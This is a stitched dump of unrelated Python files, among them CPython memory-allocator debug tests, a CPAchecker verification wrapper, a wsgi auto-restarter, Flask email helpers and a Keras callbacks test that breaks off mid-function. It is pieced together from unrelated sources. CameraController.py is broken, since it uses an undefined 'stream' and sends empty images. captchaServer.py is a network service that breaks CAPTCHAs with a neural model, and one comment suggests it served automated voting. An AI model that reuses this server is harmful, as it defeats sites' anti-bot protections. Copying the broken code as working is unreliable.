def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
class Test_FrameAPI(unittest.TestCase):
def getframe(self):
return sys._getframe()
def getgenframe(self):
yield sys._getframe()
def test_frame_getters(self):
frame = self.getframe()
self.assertEqual(frame.f_locals, _testcapi.frame_getlocals(frame))
self.assertIs(frame.f_globals, _testcapi.frame_getglobals(frame))
self.assertIs(frame.f_builtins, _testcapi.frame_getbuiltins(frame))
self.assertEqual(frame.f_lasti, _testcapi.frame_getlasti(frame))
def test_frame_get_generator(self):
gen = self.getgenframe()
frame = next(gen)
self.assertIs(gen, _testcapi.frame_getgenerator(frame))
SUFFICIENT_TO_DEOPT_AND_SPECIALIZE = 100
class Test_Pep523API(unittest.TestCase):
def do_test(self, func):
calls = []
start = SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
count = start + SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
for i in range(count):
if i == start:
_testinternalcapi.set_eval_frame_record(calls)
func()
_testinternalcapi.set_eval_frame_default()
self.assertEqual(len(calls), SUFFICIENT_TO_DEOPT_AND_SPECIALIZE)
for name in calls:
self.assertEqual(name, func.__name__)
def test_pep523_with_specialization_simple(self):
def func1():
pass
self.do_test(func1)
def test_pep523_with_specialization_with_default(self):
def func2(x=None):
pass
self.do_test(func2)
if __name__ == "__main__":
unittest.main()
|
checker.py
|
# MIT License
#
# Copyright (c) 2018-2019 Yuxin (Ryan) Wang
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from collections import OrderedDict
from queue import Queue
import os
import subprocess
import threading
import logging
import shutil
import re
logger = logging.getLogger(__name__)
def _thread_wait_for(results, name, process):
try:
# wait for 30 seconds
out, err = process.communicate(timeout=30)
if r'Verification result: TRUE' in str(out):
results.put((True, name, None, None))
else:
results.put((False, name, out, err))
except subprocess.TimeoutExpired:
results.put((False, '30 seconds Timeout', '', ''))
def check(checkerpath, path, args=None):
funcname = os.path.splitext(os.path.basename(path))[0]
args = args.split(' ') if args else ''
logger.info('Start checking {} with multiple solvers(MathSat, Z3, SMT-Interpol)...'.format(path))
processes = OrderedDict()
processes['MathSat'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis', path, '-preprocess',
'-setprop', 'cpa.predicate.encodeFloatAs=RATIONAL', '-setprop', 'cpa.predicate.encodeBitvectorAs=INTEGER',
'-setprop', 'solver.nonLinearArithmetic=USE', '-setprop', 'output.path=output-{}-MathSat'.format(funcname),
'-setprop', 'solver.solver=MATHSAT5',
*args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
processes['Z3'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis', path, '-preprocess',
'-setprop', 'cpa.predicate.encodeFloatAs=RATIONAL', '-setprop', 'cpa.predicate.encodeBitvectorAs=INTEGER',
'-setprop', 'solver.nonLinearArithmetic=USE', '-setprop', 'output.path=output-{}-Z3'.format(funcname),
'-setprop', 'solver.solver=Z3',
*args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
processes['SMTInterpol'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis-linear', path, '-preprocess',
'-setprop', 'solver.solver=smtinterpol', '-setprop', 'output.path=output-{}-SMTInterpol'.format(funcname)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# start threads to wait for results
results = Queue()
threads = set()
for name, proc in processes.items():
thread = threading.Thread(target=_thread_wait_for, args=(results, name, proc))
threads.add(thread)
thread.start()
# get the results
errors = set()
is_verified = False
verified_solver = ''
for _ in range(len(processes)):
verified, name, out, err = results.get()
if verified:
logger.info('{} verified with {}.'.format(path, name))
# open and read report to find
with open('./output-{}-{}/Statistics.txt'.format(funcname, name)) as report:
all_report = report.read()
time = re.search(r'Total time for CPAchecker[:\s<>/a-zA-Z]*([0-9]+\.[0-9]+s)', all_report).groups()
logger.info('Verification finished in {}'.format(time[0]))
logger.info('CPA-Checker reports can be found at ./output-{}-{}'.format(funcname, name))
verified_solver = name
is_verified = True
break
else:
# log the error if this solver fails
errors.add((name, out, err))
# clean up threads and processes
for proc in processes.values():
proc.kill()
proc.wait()
for thread in threads:
thread.join()
# remove failed solver output
for solver in ('MathSat', 'Z3', 'SMTInterpol'):
if solver != verified_solver:
shutil.rmtree('./output-{}-{}'.format(funcname, solver))
# if no solvers can verify the program
if not is_verified:
logger.warning('No solvers can verify the program, error messages shown below:')
for name, out, err in errors:
logger.warning('{}:\n\tout: {}\n\terr:{}'.format(name, out.decode('ascii'), err.decode('ascii')))
return is_verified
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
from __future__ import print_function
import os
import sys
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Change detected to \'%s\'.' % (prefix, path), file=sys.stderr)
print('%s Triggering process restart.' % prefix, file=sys.stderr)
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
# If path doesn't denote a file and were previously
# tracking it, then it has been removed or the file type
# has changed so force a restart. If not previously
# tracking the file then we can ignore it as probably
# pseudo reference such as when file extracted from a
# collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except Exception:
# If any exception occured, likely that file has been
# been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while True:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Starting change monitor.' % prefix, file=sys.stderr)
_running = True
_thread.start()
|
CameraController.py
|
import sys
import threading
import logging
import os
import io
import datetime
import time
import socket
import Controller
class CameraController(Controller.Controller):
TAG_EZ_IMAGE = bytearray(b"EZIMG")
def __init__(self, name, server, resolution, framerate, log_level):
self.name = name
self.server = server
self.resolution = resolution
self.framerate = framerate
self.log_level = log_level
self.logger = logging.getLogger(name)
self.logger.setLevel(log_level)
self.shutdown = False
self.run_thread = None
def setup(self):
return True
def start(self):
if not self.setup():
self.shutdown = True
return
self.shutdown = False
self.run_thread = threading.Thread(target=self.run, args=())
self.run_thread.start()
def stop(self):
if self.shutdown:
self.logger.warning("Already stopped")
return
self.logger.debug("stopping")
self.shutdown = True
if self.run_thread is not None:
self.logger.debug("join th:%s", self.run_thread.getName())
self.run_thread.join()
def run(self):
self.logger.debug("running thread:%s", threading.current_thread().getName())
try:
self.main()
except Exception as ex:
self.shutdown = True
self.logger.debug("exception %s", ex)
try:
self.run_end()
except Exception as ex:
self.logger.debug("end exception %s", ex)
self.logger.debug("terminated")
def run_end(self):
pass
def main(self):
frame_rate_delay = 1 / self.framerate
while not self.shutdown:
data = bytearray()
data += self.TAG_EZ_IMAGE
img_len = 0
data += img_len.to_bytes(4, "little")
stream.seek(0)
data += bytearray()
self.server.send_image(bytes(data))
def send_image(self, img_bytes):
data = bytearray()
data += self.TAG_EZ_IMAGE
img_len = len(img_bytes)
data += img_len.to_bytes(4, "little")
data += img_bytes
self.server.send_image(bytes(data))
|
captchaServer.py
|
#coding:utf-8
portList=(8889,)#本服务器监听端口
import tornado.ioloop
import tornado.web
import numpy as np
from time import sleep
#import shutil
#import os
from random import random
from io import BytesIO
from PIL import Image
from base64 import b64decode
import utils
model = utils.loadmodel('Model.json', 'Weights.h5')
REFSTR = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def decaptcha(img):
try:
#upload_path=os.path.join(os.path.dirname(__file__),'files') #文件的暂存路径
#file_metas=self.request.files['file'] #提取表单中‘name’为‘file’的文件元数据
#print(file_metas)
#print(self)
#img0 = b64decode(self.get_argument('file'))
#img = Image.open(BytesIO(img0))
img = Image.open(BytesIO(img))
img = 255-np.array(img.convert('L') ) #转化为灰度图
cnt,img = utils.splitimage(img)
img = np.expand_dims(img, axis=-1)#到此result还是个图片
img = model.predict(img)
img = np.argmax(img, axis=-1)
img = ''.join(REFSTR[ch] for ch in img)
## for meta in file_metas:
## filename=meta['filename']
## filepath=os.path.join(upload_path,filename)
## with open(filepath,'wb') as up: #有些文件需要已二进制的形式存储,实际中可以更改
## up.write(meta['body'])
if(random()<0.8568):
img = img.lower()
#self.write(img)
#print(img)
## try:
## with open('%s.txt'%('未执行投票'+img),'wb') as imgSave:
## #imgSave.write(img0)
## pass
## except Exception:
## print ('存验证码出错 可能硬盘过载!')
return img
except Exception as e:
return('!')
print(e)
class MainHandler(tornado.web.RequestHandler):
## def get(self):
## #允许浏览器直接访问,手动上传图片并识别。此功能仅用于测试和娱乐
## self.write('''
##<html>
## <head><title>Upload File</title></head>
## <body>
## <form action='file' enctype="multipart/form-data" method='post'>
## <input type='file' name='file'/><br/>
## <input type='submit' value='submit'/>
## </form>
## </body>
##</html>
##''')
def get(self):
self.write('Captcha server is ready!')
async def post(self):
#img = b64decode(self.get_argument('file'))
img=self.request.body
self.write(decaptcha(img))
def run_proc(port):
app=tornado.web.Application([
(r'/',MainHandler),
])
app.listen(port)
print('CaptchaServer@localhost:%d'%(port))
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
from multiprocessing import Process
length=len(portList)
for port in range(length-1):
p=Process(target=run_proc, args=(portList[port],))
p.start()
run_proc(portList[length-1])
|
pinger_thread.py
|
import os
import threading
from timeit import default_timer as timer
def pinger():
pinger = os.popen('ping www.bbc.co.uk')
print list(pinger)
threads = []
for _ in range(4):
t = threading.Thread(target=pinger)
threads.append(t)
start = timer()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end = timer()
print('\nthreads time', end - start)
|
emails.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from wenmo.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['WENMO_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary.writer import writer_cache
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.test_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.test_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.test_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)),
0.01,
atol=1e-4)
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.test_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
